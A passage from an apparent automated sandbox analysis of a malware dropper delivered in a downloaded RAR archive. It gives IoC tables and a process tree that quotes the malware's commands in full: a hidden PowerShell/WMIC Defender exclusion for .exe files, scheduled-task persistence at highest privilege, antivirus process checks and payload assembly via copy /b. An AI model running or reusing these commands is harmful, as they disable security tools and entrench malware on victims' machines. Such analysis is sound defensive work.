5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5644	OpenWith.exe
5960	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeDebugPrivilege	380	firefox.exe
Token: SeRestorePrivilege	5960	7zFM.exe
Token: 35	5960	7zFM.exe
Token: SeSecurityPrivilege	5960	7zFM.exe
Token: SeSecurityPrivilege	5960	7zFM.exe
Token: SeSecurityPrivilege	5960	7zFM.exe
Token: SeDebugPrivilege	2980	N5p21fT8ybJlnDuVaCCCazdD.exe
Token: SeDebugPrivilege	5436	MSBuild.exe
Token: SeBackupPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeSecurityPrivilege	5436	MSBuild.exe
Token: SeDebugPrivilege	5356	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	6832	tasklist.exe
Token: SeDebugPrivilege	6896	VgIvzGc67Nj9MSZyH_qAyqJQ.exe
Token: SeIncreaseQuotaPrivilege	5684	WMIC.exe
Token: SeSecurityPrivilege	5684	WMIC.exe
Token: SeTakeOwnershipPrivilege	5684	WMIC.exe
Token: SeLoadDriverPrivilege	5684	WMIC.exe
Token: SeSystemProfilePrivilege	5684	WMIC.exe
Token: SeSystemtimePrivilege	5684	WMIC.exe
Token: SeProfSingleProcessPrivilege	5684	WMIC.exe
Token: SeIncBasePriorityPrivilege	5684	WMIC.exe
Token: SeCreatePagefilePrivilege	5684	WMIC.exe
Token: SeBackupPrivilege	5684	WMIC.exe
Token: SeRestorePrivilege	5684	WMIC.exe
Token: SeShutdownPrivilege	5684	WMIC.exe
Token: SeDebugPrivilege	5684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5684	WMIC.exe
Token: SeRemoteShutdownPrivilege	5684	WMIC.exe
Token: SeUndockPrivilege	5684	WMIC.exe
Token: SeManageVolumePrivilege	5684	WMIC.exe
Token: 33	5684	WMIC.exe
Token: 34	5684	WMIC.exe
Token: 35	5684	WMIC.exe
Token: 36	5684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1788	WMIC.exe
Token: SeSecurityPrivilege	1788	WMIC.exe
Token: SeTakeOwnershipPrivilege	1788	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5960	7zFM.exe
5824	mtLXB8vLnuL2pf2PMh9t8f_d.tmp
5100	Spec.pif
5100	Spec.pif
5100	Spec.pif
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
380	firefox.exe
380	firefox.exe
380	firefox.exe
5100	Spec.pif
5100	Spec.pif
5100	Spec.pif
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
6436	taskmgr.exe
808	firefox.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
5184	winrar-x64-701.exe
5184	winrar-x64-701.exe
5184	winrar-x64-701.exe
380	firefox.exe
380	firefox.exe
380	firefox.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe
5644	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 3032 wrote to memory of 380	3032	firefox.exe	77
PID 380 wrote to memory of 4600	380	firefox.exe	78
PID 380 wrote to memory of 4600	380	firefox.exe	78
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4560	380	firefox.exe	79
PID 380 wrote to memory of 4680	380	firefox.exe	80
PID 380 wrote to memory of 4680	380	firefox.exe	80
PID 380 wrote to memory of 4680	380	firefox.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3408
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\download.jpg
  2⤵
  PID:212
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:380
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.0.417673818\614700653" -parentBuildID 20221007134813 -prefsHandle 1684 -prefMapHandle 1676 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0ef17fa-d4da-4121-9b73-807af71b7240} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1764 204c5d03b58 gpu
      4⤵
      PID:4600
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.1.305502145\1558000322" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c9f0b1f-5e3b-4418-8458-e8ffc2e6315d} 380 "\\.\pipe\gecko-crash-server-pipe.380" 2120 204b2872e58 socket
      4⤵
      PID:4560
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.2.1742599764\1964991578" -childID 1 -isForBrowser -prefsHandle 2676 -prefMapHandle 2964 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {134a333a-8b7f-4f2f-a204-3489139bea1f} 380 "\\.\pipe\gecko-crash-server-pipe.380" 3032 204c8d9e458 tab
      4⤵
      PID:4680
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.3.1967641834\172761592" -childID 2 -isForBrowser -prefsHandle 3476 -prefMapHandle 3472 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {29cdda3d-e12b-43a6-b7bf-d412118f5862} 380 "\\.\pipe\gecko-crash-server-pipe.380" 3488 204c9b47e58 tab
      4⤵
      PID:3036
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.4.1877024748\1422216179" -childID 3 -isForBrowser -prefsHandle 4400 -prefMapHandle 4396 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {832aedda-84e2-4013-851e-2bb6b32a57ac} 380 "\\.\pipe\gecko-crash-server-pipe.380" 2432 204c9ce5d58 tab
      4⤵
      PID:660
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.5.552060630\2110212119" -childID 4 -isForBrowser -prefsHandle 4820 -prefMapHandle 4816 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {77f5ff36-4cd0-413e-8238-f7ddbb808dc3} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4828 204b2869658 tab
      4⤵
      PID:212
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.6.1769674023\1418023007" -childID 5 -isForBrowser -prefsHandle 4964 -prefMapHandle 4968 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f97bd5af-9404-4b76-a328-6baf243d83cc} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4780 204cb258658 tab
      4⤵
      PID:392
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.7.925785033\315721592" -childID 6 -isForBrowser -prefsHandle 5116 -prefMapHandle 5124 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fe4a97f-ca87-4ff7-902f-2fbee65e68ed} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4752 204cb9cc258 tab
      4⤵
      PID:4636
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.8.1008329518\1082817580" -childID 7 -isForBrowser -prefsHandle 5512 -prefMapHandle 5508 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b7e23cf-787e-45c1-a2ee-1a1be26df40e} 380 "\\.\pipe\gecko-crash-server-pipe.380" 5524 204c74c0b58 tab
      4⤵
      PID:4492
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.9.1009123492\1618103232" -childID 8 -isForBrowser -prefsHandle 5664 -prefMapHandle 5668 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a33c0c1-0217-474d-b5d2-0ffd395e6895} 380 "\\.\pipe\gecko-crash-server-pipe.380" 5656 204c74bea58 tab
      4⤵
      PID:3748
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.10.192281878\2010623630" -childID 9 -isForBrowser -prefsHandle 4852 -prefMapHandle 4840 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3939c5a-799d-4a3f-bc49-e881de08528c} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4936 204b2869658 tab
      4⤵
      PID:5084
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.11.337518851\1500074223" -childID 10 -isForBrowser -prefsHandle 4976 -prefMapHandle 6712 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2554af77-9490-428f-acfd-778eb761cec0} 380 "\\.\pipe\gecko-crash-server-pipe.380" 6708 204cea24b58 tab
      4⤵
      PID:4604
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.12.641373433\2068032520" -childID 11 -isForBrowser -prefsHandle 6984 -prefMapHandle 6980 -prefsLen 26768 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f38e0029-1edd-4086-b293-a0aef0f93774} 380 "\\.\pipe\gecko-crash-server-pipe.380" 7000 204cfa24b58 tab
      4⤵
      PID:2792
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.13.1224337448\386910418" -childID 12 -isForBrowser -prefsHandle 7240 -prefMapHandle 7252 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5dc56c0-07ff-4af6-b257-1f06c0de437b} 380 "\\.\pipe\gecko-crash-server-pipe.380" 7260 204d022e558 tab
      4⤵
      PID:5448
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="380.14.57658219\702257263" -childID 13 -isForBrowser -prefsHandle 4908 -prefMapHandle 5156 -prefsLen 26864 -prefMapSize 233444 -jsInitHandle 1368 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4776c8b6-c927-43b3-a3fe-6181e8523d53} 380 "\\.\pipe\gecko-crash-server-pipe.380" 4516 204d0491b58 tab
      4⤵
      PID:5848
  - - C:\Users\Admin\Downloads\winrar-x64-701.exe
      "C:\Users\Admin\Downloads\winrar-x64-701.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5184
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\dvg9f217archive3.rar"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:5960
- - C:\Users\Admin\AppData\Local\Temp\7zO847EDF5A\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO847EDF5A\setup.exe"
    3⤵
    - Modifies firewall policy service
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2824
  - - C:\Users\Admin\Documents\SimpleAdobe\mtLXB8vLnuL2pf2PMh9t8f_d.exe
      C:\Users\Admin\Documents\SimpleAdobe\mtLXB8vLnuL2pf2PMh9t8f_d.exe
      4⤵
      Executes dropped EXE
      PID:5444
    - - C:\Users\Admin\AppData\Local\Temp\is-S688J.tmp\mtLXB8vLnuL2pf2PMh9t8f_d.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S688J.tmp\mtLXB8vLnuL2pf2PMh9t8f_d.tmp" /SL5="$40368,5324845,54272,C:\Users\Admin\Documents\SimpleAdobe\mtLXB8vLnuL2pf2PMh9t8f_d.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:5824
      - C:\Users\Admin\AppData\Local\UDA DVD Free Ripper\udadvdfreeripper32_64.exe
        
        "C:\Users\Admin\AppData\Local\UDA DVD Free Ripper\udadvdfreeripper32_64.exe" -i
        6⤵
        Executes dropped EXE
        
        PID:6572
      - C:\Users\Admin\AppData\Local\UDA DVD Free Ripper\udadvdfreeripper32_64.exe
        
        "C:\Users\Admin\AppData\Local\UDA DVD Free Ripper\udadvdfreeripper32_64.exe" -s
        6⤵
        Executes dropped EXE
        
        PID:6660
  - - C:\Users\Admin\Documents\SimpleAdobe\CHC1Ja3N9zVCFx9C8fonBRBA.exe
      C:\Users\Admin\Documents\SimpleAdobe\CHC1Ja3N9zVCFx9C8fonBRBA.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:216
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6228
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6136
  - - C:\Users\Admin\Documents\SimpleAdobe\pfiy2exChn3CqhXvQhVWiOVV.exe
      C:\Users\Admin\Documents\SimpleAdobe\pfiy2exChn3CqhXvQhVWiOVV.exe
      4⤵
      Executes dropped EXE
      PID:5632
    - - C:\Users\Admin\AppData\Local\Temp\7zS7AAF.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:6236
      - C:\Users\Admin\AppData\Local\Temp\7zS830C.tmp\Install.exe
        
        .\Install.exe /VvxORdidQSj "525403" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:6704
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3960
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5684
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmQWCxleEgxbTUrSZz" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS830C.tmp\Install.exe\" xv /Kagdidb 525403 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:6300
  - - C:\Users\Admin\Documents\SimpleAdobe\VGlFfVqCguuCTXTcD5bE39Y4.exe
      C:\Users\Admin\Documents\SimpleAdobe\VGlFfVqCguuCTXTcD5bE39Y4.exe
      4⤵
      Executes dropped EXE
      PID:5288
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k copy Urban Urban.cmd & Urban.cmd & exit
        5⤵
        
        PID:5788
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6832
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        6⤵
        
        PID:6852
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5508
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
        6⤵
        
        PID:5516
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 780229
        6⤵
        
        PID:3700
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "STEADYSIMSCOLLABORATIVEHUMANITIES" Stylus
        6⤵
        
        PID:588
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Conservative + Transmission + Employee + Conservation + Coastal + Atlanta 780229\p
        6⤵
        
        PID:1324
      - C:\Users\Admin\AppData\Local\Temp\780229\Spec.pif
        
        780229\Spec.pif 780229\p
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5100
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:4796
  - - C:\Users\Admin\Documents\SimpleAdobe\Lu14imnD2sxKHhwWy9r1EduD.exe
      C:\Users\Admin\Documents\SimpleAdobe\Lu14imnD2sxKHhwWy9r1EduD.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5628
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:6016
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 272
        5⤵
        Program crash
        
        PID:6548
  - - C:\Users\Admin\Documents\SimpleAdobe\5mUTMG7kBiiswxGyspDxDQTV.exe
      C:\Users\Admin\Documents\SimpleAdobe\5mUTMG7kBiiswxGyspDxDQTV.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EBGCFBGCBF.exe"
        5⤵
        
        PID:5132
      - C:\Users\Admin\AppData\Local\Temp\EBGCFBGCBF.exe
        
